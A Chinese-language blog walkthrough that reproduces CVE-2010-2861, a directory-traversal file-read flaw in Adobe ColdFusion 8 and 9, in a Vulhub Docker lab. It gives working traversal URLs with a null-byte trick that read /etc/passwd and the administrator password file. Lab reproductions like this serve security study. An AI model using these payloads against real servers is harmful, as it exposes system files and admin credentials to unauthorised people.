利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

    • Vulnhub官方复现教程
      • 漏洞原理
    • 复现漏洞
      • 启动环境
    • 漏洞复现

Vulnhub官方复现教程

https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/

漏洞原理

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056

进入路径为

cd /root/vulhub/coldfusion/CVE-2010-2861

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第1张图片此次环境搭建较大,1G+,速度根据网速- -,建议站起来走走:)
启动后访问http://your-ip:8500/CFIDE/administrator/enter.cfm,可以看到初始化页面,输入密码admin,开始初始化整个环境。
【注意】本文中所有的your-ip请改为自己的IP地址
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第2张图片

漏洞复现

访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en,即可读取文件/etc/passwd
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第3张图片【注意】是在HTMLTab下利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第4张图片
读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第5张图片

你可能感兴趣的:(渗透)